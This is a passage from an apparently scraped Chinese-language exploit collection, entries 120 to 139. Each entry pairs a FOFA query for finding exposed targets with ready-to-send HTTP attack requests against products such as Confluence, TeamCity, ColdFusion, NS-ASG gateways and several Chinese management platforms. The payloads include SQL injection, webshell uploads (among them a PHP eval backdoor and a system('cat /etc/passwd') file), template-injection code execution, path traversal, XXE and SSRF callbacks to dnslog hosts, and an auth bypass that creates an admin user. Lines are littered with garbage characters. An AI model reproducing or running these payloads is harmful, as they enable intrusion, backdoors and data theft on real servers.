src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
% R/ S: E. a* k. h1 n( V/ S0 L, M
! Q1 y( D0 x6 t- E5 l* g0 h% D: R120. 北京百绰智能S40管理平台导入web.php任意文件上传
" _! a& x$ s; \8 Z+ G+ `! bCVE-2024-1253
) ~' `3 x- j3 l0 C5 |3 ?+ t7 gFOFA:title="Smart管理平台"
$ a( A3 C8 F, x* o* B3 BPOST /useratte/web.php? HTTP/1.1
' p. t$ X+ g( M. x9 t4 ~) C; lHost: ip:port
, _1 b9 a' r) I$ j" ^8 NCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
, k# B- h0 g2 M/ r+ V- W8 d/ sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko) r5 @1 o2 s0 J& {/ Q6 N! K& u) C6 h# v$ A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" C4 ~; B+ A2 y- _& _7 ~( {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* ^4 L6 v C+ o% J& m) @" ^Accept-Encoding: gzip, deflate
% `6 @6 ^! _+ zContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
/ u* V% k, b* x+ D* x+ J$ |8 \& hContent-Length: 5971 x# j3 r4 G2 r! s3 r1 G
Origin: https://ip:port+ Y6 a+ t6 N4 C# [# ?. z
Referer: https://ip:port/sysmanage/licence.php
! }$ D5 h4 y+ K$ b! X) {6 zUpgrade-Insecure-Requests: 1
. E6 G4 K! b: gSec-Fetch-Dest: document/ q# g( a4 I5 m3 R* j! u" N
Sec-Fetch-Mode: navigate4 }" e9 c9 W2 @& J" j5 c" [
Sec-Fetch-Site: same-origin3 H( d! t% a7 B
Sec-Fetch-User: ?1& ^* F- Y7 k, [! j* D% t
Te: trailers
7 R/ Q- ~8 t* z9 Z7 s! q0 [Connection: close: k& e. H) E! @, T
7 X3 U0 X7 ]9 d. x4 O3 R-----------------------------42328904123665875270630079328# B5 }+ N3 _5 Q6 F
Content-Disposition: form-data; name="file_upload"; filename="2.php"
' @- k( G: k7 L8 mContent-Type: application/octet-stream
0 [+ v. ^1 J# a8 f# h- Q" D- V/ A) f( `+ Z( A& A5 d6 c' Z
<?php phpinfo()?>2 x* Q, w8 e0 i. }, Q+ x
-----------------------------42328904123665875270630079328
8 `! G# U- y4 Z/ X6 M: c( T0 {Content-Disposition: form-data; name="id_type"3 V; L) O/ R# c7 \( r5 b9 {
/ R# K% n- K: a: U' {8 l1* j% q2 e. a9 Z I
-----------------------------42328904123665875270630079328
* J% J7 G; M- NContent-Disposition: form-data; name="1_ck"
Z* w4 a! v6 V
' K0 _7 G) A! {* R! E& M4 W1_radhttp1 n$ {' b; z$ q: J: A( R
-----------------------------42328904123665875270630079328
- w8 u7 B/ l( _: z+ U1 V. @. q# w7 J$ _$ EContent-Disposition: form-data; name="mode"$ M6 K/ O# S+ O( ]- K7 }9 T
: ?4 i" K" Z* _$ M" D+ @5 A
import0 ^( w: g9 u) c9 J' [0 S- r; u( f
-----------------------------42328904123665875270630079328) G* T' b! H* O, E8 Z
. u5 z# }! n7 ]: @& r9 i
2 n( x0 s# S" l
文件路径/upload/2.php6 M" `8 o0 c1 L: X6 X
% b; }$ Z8 L. L& K/ S- N: K121. 北京百绰智能S42管理平台userattestation.php任意文件上传; R5 Z e; E" }) W1 V' i
CVE-2024-19185 V/ X H/ @& ?
FOFA:title="Smart管理平台"
; k/ Q% y$ K5 ?! _3 qPOST /useratte/userattestation.php HTTP/1.1
+ @# f9 K0 c4 d. j0 K$ MHost: 192.168.40.130:84430 J7 t9 I% |4 w- k9 Q
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
! T5 S' O& i0 e$ Z: g8 F/ OUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
5 ~( V; m9 N) CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 C, V- W/ {' S$ e1 Z4 J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# L8 y: m/ V8 X% u, CAccept-Encoding: gzip, deflate
8 L- U" H: n$ m3 ]$ ?1 S' fContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
; Y' I5 I4 Y% yContent-Length: 5921 ~( d8 X; _ J% U r/ }
Origin: https://192.168.40.130:8443
0 n% p. g! s2 ~3 Y8 Q: J8 }Upgrade-Insecure-Requests: 1
* [4 t3 y7 G3 N' j6 ^2 ZSec-Fetch-Dest: document8 B. k, J2 I) Z
Sec-Fetch-Mode: navigate1 w( T* z! m( u
Sec-Fetch-Site: same-origin8 l7 x' S: V# h8 L+ g2 K# W
Sec-Fetch-User: ?13 k5 R: I5 [& _0 \3 T# ^
Te: trailers6 [" [, h0 P7 b. Q9 g7 s! b
Connection: close8 J" Y- w1 P* v+ @/ x; k6 u f! j
( d0 P9 ?' Z) `6 @, r6 H-----------------------------42328904123665875270630079328
& {0 M) w+ G# ?) w' J; V" WContent-Disposition: form-data; name="web_img"; filename="1.php"
- P4 f$ B; q) ]& S% ]% ZContent-Type: application/octet-stream
' I; B9 L! _: [% f* L& a: q, H2 B5 h) ~
<?php phpinfo();?>6 N, @" `4 x0 J9 [$ Y/ Y
-----------------------------42328904123665875270630079328$ Q7 S: [9 m4 U: k
Content-Disposition: form-data; name="id_type"4 g; e: L* }3 K% J+ v( N8 R; d
- a' F, p1 T5 u% h
1
& m9 e7 O( d. W/ a-----------------------------423289041236658752706300793288 R- D Q2 K" u" v6 Q
Content-Disposition: form-data; name="1_ck"
6 O, |' c j4 O+ V3 r
0 X+ s5 m! n5 a# Y) B/ V1_radhttp
( Y f6 K$ K- ]/ \6 ]% K6 D: m& X-----------------------------42328904123665875270630079328( S3 r4 z1 M s- Q
Content-Disposition: form-data; name="hidwel"
[5 K- h5 z) E6 E5 ^* z3 r$ y1 n" w5 Q9 `
set* H; p& D1 J, S$ a( r% g! k
-----------------------------42328904123665875270630079328. M; D5 U8 r9 i) c |
d# `2 u4 ]$ k3 H& ]( Y' P! n
3 ^ h+ l9 q$ ~8 Z$ Wboot/web/upload/weblogo/1.php% ?% @( R" r/ C& i8 V9 r+ C V
! Q+ X( C1 W ^, |, J" ~0 V7 l5 K122. 北京百绰智能s200管理平台/importexport.php sql注入
5 ~2 J/ ~$ E% {" l1 p/ @( WCVE-2024-27718FOFA:title="Smart管理平台"
9 d) v, d4 [: Y7 [7 F6 X其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()7 m% i. Y$ X. C
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
1 t1 \: j# @! y5 n7 f) PHost: x.x.x.x
a: k* E* l. d& c# N4 yCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0$ s$ {; H' R8 [5 E4 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) @0 F* K/ K4 B, `- a0 L8 G* X3 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. m6 i6 r7 i- c3 V" fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 q9 x$ J8 ]4 v* R9 i" D$ s3 DAccept-Encoding: gzip, deflate, br) J/ T+ F6 v4 @
Upgrade-Insecure-Requests: 1
9 h- @+ F5 Q0 y8 C# V, MSec-Fetch-Dest: document" u1 ]$ {" {+ y% s
Sec-Fetch-Mode: navigate
3 }' S, f2 k0 ^& ySec-Fetch-Site: none
* e2 J0 [2 H& A# ]- \Sec-Fetch-User: ?1
' I9 I! F+ a: H- LTe: trailers
" [& M6 _* \1 g$ ^9 B4 L4 h2 @; V, _4 eConnection: close) J. \2 ?" P$ O* i0 R( d& n. J
! \/ V8 E9 A) C+ M8 E# d
% G0 F! E! E7 m( i* O- d' p: \- c123. Atlassian Confluence 模板注入代码执行
9 L* y# D2 k) j$ h" |7 A4 nFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3" A$ o+ u8 b4 a" x( I, P/ F! D4 _
POST /template/aui/text-inline.vm HTTP/1.1
( o4 O( x, @+ l3 [! XHost: localhost:80908 a/ d0 A- N1 E. w1 D
Accept-Encoding: gzip, deflate, br8 Q5 t1 h O, e7 }9 f: T
Accept: */*
8 f2 n% ~7 q- n; o) c* pAccept-Language: en-US;q=0.9,en;q=0.83 D5 \4 J# [% ?6 w1 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
4 J- |) V O$ i9 s; K/ ZConnection: close
3 C3 j- H8 i' B8 o, U2 u- r. E; ^0 IContent-Type: application/x-www-form-urlencoded0 d& D% `# V- `4 Z f
/ q0 {( V' G( c+ }* L5 _( {label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})): F/ n% j: M: `* w
6 t4 J% ?" l2 c+ B' V A5 N* N
& N/ a/ h& J/ \
124. 湖南建研工程质量检测系统任意文件上传 t! N: h% s$ e* n5 p
FOFA:body="/Content/Theme/Standard/webSite/login.css"* @1 u8 R4 z; Z% R0 F1 n- S
POST /Scripts/admintool?type=updatefile HTTP/1.1
( C: G0 W- I! j& f1 J' n* V( q% oHost: 192.168.40.130:8282
3 B0 M2 `! E& B, G& {( z# ~User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
, E$ J+ q. l; l- _: M4 n1 eContent-Length: 72
c- ~$ o9 l |5 E6 i% C( w8 W4 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- y! g: Z) m$ ?% P8 w1 M: iAccept-Encoding: gzip, deflate, br* v5 s* N: |+ a( ^% O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ x5 p% Z2 m1 G w7 D- d
Connection: close* c* `8 Q7 @# W7 k4 @
Content-Type: application/x-www-form-urlencoded
% n" I) U \' x( _9 \' M- ~! P5 j
& |0 \+ w# B; ]1 HfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>( G' }& ]5 ~+ S. \2 X8 _9 x9 U r9 H
5 A$ E0 [( u# h1 D/ M y
/ E7 E# \, n' I7 v v7 ~http://192.168.40.130:8282/Scripts/abcgcg.aspx6 F) m4 M6 m% l1 Y6 b `
0 S' ~! ~: F# b; b; O3 P. j8 P
125. ConnectWise ScreenConnect身份验证绕过
6 ?1 }, ^* `& E- p' b! rCVE-2024-1709
8 f) n4 B: d' F! M) o4 `FOFA:icon_hash="-82958153"
( o8 T1 \. q/ D' L0 H3 bhttps://github.com/watchtowrlabs ... bypass-add-user-poc
, h. r5 s1 q9 A
5 u: }# Y( |6 Z% R* o
`" }3 N) |8 I+ q+ e3 D使用方法
9 x7 Q& Q/ W6 e0 o0 T4 |7 |python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!4 N8 B1 F0 z5 g0 e4 o$ M
3 z, v* O. n% _, C5 A
! h0 h8 A6 e! I& p) h" ^9 ]
创建好用户后直接登录后台,可以执行系统命令。
- W6 X& o' c9 t) D
" a" D& l, H. d0 V3 B126. Aiohttp 路径遍历
2 A0 R, j3 u, N5 E) W5 [% w9 DFOFA:title=="ComfyUI"# ]) i' a- q* `2 B- @- h1 m+ M k& F
GET /static/../../../../../etc/passwd HTTP/1.1' K: u5 p7 n7 n# x( O8 R& L
Host: x.x.x.x
5 I3 a! c9 O! N j* \7 J9 ^ lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.365 v) t0 V. \+ M& `4 f0 f/ U
Connection: close Q' S5 K/ U' p. w6 {
Accept: */*
- |+ Q1 M, b8 BAccept-Language: en
8 c& K% T6 w& {' AAccept-Encoding: gzip
/ i: ]+ L; f: W1 Z6 P9 f( D3 k' e2 n/ |1 _! h: c+ N# C
, w, F5 w# }* k' J( T4 c8 T
127. 广联达Linkworks DataExchange.ashx XXE
8 m5 [) E0 R$ m' x" ^ ^FOFA:body="Services/Identification/login.ashx" , c& x* k% j( ~
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.19 \# m# B' g6 C7 w5 g
Host: 192.168.40.130:8888
2 v8 q% Q; t! ?) kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36# n8 ], [/ U# d8 T8 K
Content-Length: 415. |9 P3 a* m( p* d7 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 t# p" z- K( H3 I
Accept-Encoding: gzip, deflate( C- a) n- @. P8 u. P: U, P4 m
Accept-Language: zh-CN,zh;q=0.9
- j* p6 q" p3 A8 s, Q4 L( s( ?' o B( DConnection: close
1 V" @7 n! K0 ]' p- uContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
. l5 X% D4 [3 t) N/ A* Q# j) G+ I! iPurpose: prefetch/ P0 O: X D. @+ y
Sec-Purpose: prefetch;prerender, D P( L+ D$ ?
6 ^9 _$ G8 `. s7 N3 E------WebKitFormBoundaryJGgV5l5ta05yAIe01 N0 U* {/ A p7 @7 S1 K, ~
Content-Disposition: form-data;name="SystemName"
, J- ?" E; n! {) D% Q: e! l8 n9 ?3 l
BIM+ a9 A, G- p/ Q) i5 Y
------WebKitFormBoundaryJGgV5l5ta05yAIe0
7 @/ X2 X& I6 w. u' m3 @Content-Disposition: form-data;name="Params"
6 O* S8 O% _, e8 R4 G4 k& r+ n" sContent-Type: text/plain I. _2 U, m b. ? @
1 e0 W2 s# x8 }, W
<?xml version="1.0" encoding="UTF-8"?>
1 o) y! t. y8 x2 j' W9 N<!DOCTYPE test [
, v' J |6 O' q# n# g<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
( i, T6 L( P4 G5 s]% U/ S5 |6 ~' n! h
>
0 G D# j4 g0 ~/ E% r. `8 [0 a- v<test>&t;</test>7 [; c8 k' O3 F! S$ \$ F
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
+ ]2 q9 F% Y2 a2 H [4 d+ A' `" H* e6 I9 J
8 H Z" O1 T: T5 B0 t( b1 o0 G2 K; k& D3 i( Y
128. Adobe ColdFusion 反序列化5 J& g: B3 t2 e5 h
CVE-2023-38203
; m4 c$ `/ G4 ?4 WAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)# N7 A, V8 n7 O6 z
FOFA:app="Adobe-ColdFusion"+ s c1 }' ?, F3 K, ]- x( k1 P
PAYLOAD
# Y: t# V2 U/ q/ K
0 j( r/ Z6 z* Q. ?7 P2 V129. Adobe ColdFusion 任意文件读取8 W/ f1 c9 o( C& v. D
CVE-2024-207674 w9 O- C9 Q$ J3 f E
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
) `! _0 I Q6 S- @" j第一步,获取uuid" Z3 z" _ i; j
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
* y& `' m+ ~1 ^% qHost: x.x.x.x- T D$ t: B% _+ ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
( t( D' Q/ B: [, ~Accept: */*
) X! m7 z( C6 Q: R0 E K# {* h2 e: zAccept-Encoding: gzip, deflate2 }$ l# Y/ `% f( [; R# r7 k! p0 ]
Connection: close
: r, N* ~+ M# V9 J' B) M+ y& m% N! h- ]
9 j+ I5 v$ m" n f第二步,读取/etc/passwd文件! j1 x3 `8 C7 h P3 A) t+ t
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
. B; {" q2 K; `& P0 ^! IHost: x.x.x.x
3 b$ Z( C) F q! E1 Q9 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" Y& u; @8 h& C- z1 hAccept: */*
) k- W: d2 Y( |, G* p; C7 YAccept-Encoding: gzip, deflate0 ~; S! C- _% K7 q& r/ K8 e R! C
Connection: close* _) L5 E. a. y. W7 \' e O
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
- [/ F$ z0 _! e) w( D9 d4 Q/ i9 \) t- B& l5 z0 ^0 \
* F. l6 P, H: t- w/ a( I9 X2 U130. Laykefu客服系统任意文件上传3 }& d6 b+ P, n- @+ A4 j: `) S# W
FOFA:icon_hash="-334624619"
^+ B* h& O5 n/ T/ k% ePOST /admin/users/upavatar.html HTTP/1.14 l+ k: T* U4 j. V1 |
Host: 127.0.0.1+ o) M! N5 L. f0 z( k) S
Accept: application/json, text/javascript, */*; q=0.01" ~! R N2 |$ j& p
X-Requested-With: XMLHttpRequest- B" u: w) ]1 G: {1 k1 ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26* }/ ]3 u+ `- O; }) k* k2 p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR) D- H/ O3 l' W1 B6 u4 x) B) f, g7 g
Accept-Encoding: gzip, deflate
, x, m) c7 X; ~/ d4 [; D3 zAccept-Language: zh-CN,zh;q=0.9% G% q4 v8 k. U, ]3 x3 k
Cookie: user_name=1; user_id=3& K s) q! {! U$ n8 [2 C9 G
Connection: close
$ P9 c0 Z5 A8 ]0 U/ @
$ `' {, K4 i6 [" l------WebKitFormBoundary3OCVBiwBVsNuB2kR2 `: v, C2 o. i
Content-Disposition: form-data; name="file"; filename="1.php"1 a. ^) C2 q, d( h7 h6 Z- X6 M
Content-Type: image/png5 r% y+ R3 t$ M5 S# y9 J
) t, r. j. o% g# I9 b- c5 Q
<?php phpinfo();@eval($_POST['sec']);?>: N% |# }! [, F0 \& U4 B' q
------WebKitFormBoundary3OCVBiwBVsNuB2kR--4 [) q9 w3 s b l7 Q. r \
1 r. w1 k3 |9 h/ U. w0 Y$ x$ z2 H
131. Mini-Tmall <=20231017 SQL注入' T9 h9 Z; A2 v1 t* y
FOFA:icon_hash="-2087517259"
1 {8 w6 `/ ^$ u1 ?$ z; |& i- c1 e后台地址:http://localhost:8080/tmall/admin/ w# v1 q. f P2 Z- E% A% N
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
2 m* o* ~8 k, O; i1 v; v8 @& v: B. ~, b2 ^: S2 d9 t, y0 {% K' f" o T
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过( ~- x# I+ u( R5 g6 o( ~' P
CVE-2024-27198# D w2 c0 h& H6 |6 M$ V
FOFA:body="Log in to TeamCity"
/ X) h. `& n: BPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
- _# ?! L$ i8 q& U; B$ x$ i) ^Host: 192.168.40.130:8111
3 |( R/ k6 J; c" i# `2 t# z7 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, Z: _% C' H8 g( ^5 aAccept: */*
# y N) P& C g0 n/ ~6 Y! g# NContent-Type: application/json
: H7 q$ E* T4 [/ R; vAccept-Encoding: gzip, deflate; X' q5 n4 S) x; `- l
* Z0 ]" x0 T9 r3 T" w
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
% s2 j$ K5 M; {$ d- }7 E
9 C* T V1 A) s* D
. i* Q6 e! c4 mCVE-2024-27199
+ S; j5 z& r4 i* A/res/../admin/diagnostic.jsp6 c8 J3 X2 ~& z8 w! h
/.well-known/acme-challenge/../../admin/diagnostic.jsp
% A% R: B( M: s+ z9 {# H/update/../admin/diagnostic.jsp- a. \1 S9 I5 I8 C0 D: d3 {
$ \3 a1 |: p4 B. m# g
+ a" J* t6 a$ {/ lCVE-2024-27198-RCE.py) D" I" x/ O) Y' t: N
) X5 f& ]% M5 a4 I' L8 J( R133. H5 云商城 file.php 文件上传6 ?/ B8 i# U9 w
FOFA:body="/public/qbsp.php"
/ j0 Y( W( U2 n) l4 c2 J* ePOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
; e; \7 o* `; ?7 M q e1 I/ BHost: your-ip: f5 |1 v4 i; M( r3 {" ]% X: W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
2 b" o3 F5 R9 Q* |; Q+ ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx1 D( e9 H5 e4 v0 P( K9 _$ A
! ?( M4 L$ K7 Z$ J4 G2 M
------WebKitFormBoundaryFQqYtrIWb8iBxUCx1 f$ ^) b. N3 k$ X
Content-Disposition: form-data; name="file"; filename="rce.php"+ N3 Z9 P" V* C1 K' ?" k8 k
Content-Type: application/octet-stream
7 t& S3 i; P2 c* J5 H# d ^# t6 D5 l 0 r4 P- M! e; f2 z
<?php system("cat /etc/passwd");unlink(__FILE__);?>
+ x, i+ f1 c G7 o" [------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
- n# p$ w% b+ r0 j, r7 {( F+ r; \' A6 E) [
. z4 t6 H* V! [/ _3 B. g6 c' ^( R j+ F
134. 网康NS-ASG应用安全网关index.php sql注入
; S. Q6 g" a0 ]: m1 `5 }* M" [CVE-2024-2330
1 |* t+ L7 h9 i6 WNetentsec NS-ASG Application Security Gateway 6.3版本8 n+ a6 d8 l' [3 L7 g0 p. \
FOFA:app="网康科技-NS-ASG安全网关"
8 k5 }+ g- j0 T' I. |) yPOST /protocol/index.php HTTP/1.1$ `0 F$ t. R& q' Y9 f) ?
Host: x.x.x.x
4 A9 ?/ V$ L+ U i! n: M; JCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
6 ]9 Q9 v$ L; f: IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
; W4 Q5 g4 M2 J. ^5 C3 {# xAccept: */*6 m5 k5 X) Q, n: h* A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 ]- `7 o8 S# S' Y; x, u) uAccept-Encoding: gzip, deflate: Y$ q2 v1 m7 R x6 o# m8 R) P
Sec-Fetch-Dest: empty
- H+ W4 w, s) d: NSec-Fetch-Mode: cors( o% g9 o9 k( H' v. N& V% {5 v2 J& s
Sec-Fetch-Site: same-origin/ g& c4 q4 V- C2 \1 u' Q4 q
Te: trailers9 U5 c- u r) a; f
Connection: close7 Q: w; [5 y& g" A" v4 I& T4 n+ B3 a
Content-Type: application/x-www-form-urlencoded" B+ k: G0 C- e. R; g7 b% f
Content-Length: 263
1 W/ h! O, p- k: \" M8 T
) D8 d9 j7 _! C! R( Y* zjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
) b9 O. s3 }, B+ `- o& X5 M
, G' y5 U& u6 t6 x" j0 q6 ?9 E# V5 `! T0 L
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
3 y0 z5 ?9 c* R5 |$ z: Z5 t! G: T5 vCVE-2024-2022
7 S! I# i$ @) W9 FNetentsec NS-ASG Application Security Gateway 6.3版本
9 Y/ C, M5 x* e( g6 o7 tFOFA:app="网康科技-NS-ASG安全网关"$ g# O4 W# D8 y5 |8 i) R+ p: i
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
R* ]+ S2 \6 E. KHost: x.x.x.x
/ p( L/ _4 g& A! ?- aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ Q/ p0 q9 v: k XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) N) N+ {+ ]4 f, A% C+ L8 R& G
Accept-Encoding: gzip, deflate5 P6 z+ X! y, M i
Accept-Language: zh-CN,zh;q=0.9
) F4 k5 h* M5 ], I1 `% x- W: I' GConnection: close/ z% Y( u* w' ~! U
/ P9 G2 ^! G# q7 C
( O" g! S. r* }# ~' J4 B- u; {136. NextChat cors SSRF; ?* W0 n1 D- R8 b. U, ?
CVE-2023-49785
9 H" ` ]9 s8 f* U2 _; nFOFA:title="NextChat"
- p% M# F& b; w( |8 S, gGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
" M) h2 r/ I2 nHost: x.x.x.x:100005 h; `; R b! b- U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 C! H, O8 ?3 q% t, [' @
Connection: close
6 r: ]& ?% Y7 D6 t; H+ F* B# TAccept: */*( h b) R8 z0 g
Accept-Language: en( i( k6 ^0 o ~. R' E) \
Accept-Encoding: gzip' e+ d) R3 l( m
0 P# N. @1 [9 U4 J
$ _; k% A: ^4 Y137. 福建科立迅通信指挥调度平台down_file.php sql注入
3 K7 S- K' A1 l% `. z wCVE-2024-2620
( O) V2 h" v& @8 BFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"# z2 |4 d9 G2 ~
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.13 C. r. ?! R- u5 v- r8 r1 p& K
Host: x.x.x.x1 \6 j& O& ]" p$ e6 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 D( M) I0 V3 h1 M- Q' x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 t5 Z/ t1 X3 f; ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 i/ b, O' C& X
Accept-Encoding: gzip, deflate, br
- C! L0 H& \& v0 G) ~+ O4 X7 SConnection: close
4 v4 r6 f3 Y5 X' VCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj2 B" Y& P% K2 `# x9 U% U0 h# ~
Upgrade-Insecure-Requests: 10 M+ m2 _; F8 [% y1 A# |) u9 |
2 q& Q2 Y- l+ O# i; C! H8 a* O
9 z$ D- |" L0 ]- z! |
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入! [! O: `' W# r
CVE-2024-2621
4 m+ \& \) F. S v" OFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 _0 f1 l% [; W/ w) I
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1( n4 I+ L9 x8 J8 [
Host: x.x.x.x) q5 G; d8 [% N( p% }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 M' x8 q5 n1 G- R: oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' U& F% {1 Z& b B" Y2 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 @4 `- B* _" u, P6 _) t1 L0 r4 Y0 C
Accept-Encoding: gzip, deflate, br
% {9 ]( p1 \6 ~4 ZConnection: close
1 f4 l' g6 i+ g: Z+ }) d( yUpgrade-Insecure-Requests: 1. F5 N# ^7 i* K
# h9 [5 [/ h1 Y1 j' k8 |( }7 \
: u4 U3 ^2 [+ w
139. 福建科立讯通信指挥调度平台editemedia.php sql注入$ _4 p! l# n9 Z( k7 M, ~( N: Z
CVE-2024-2622
: z% I. l$ {) M* L1 AFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
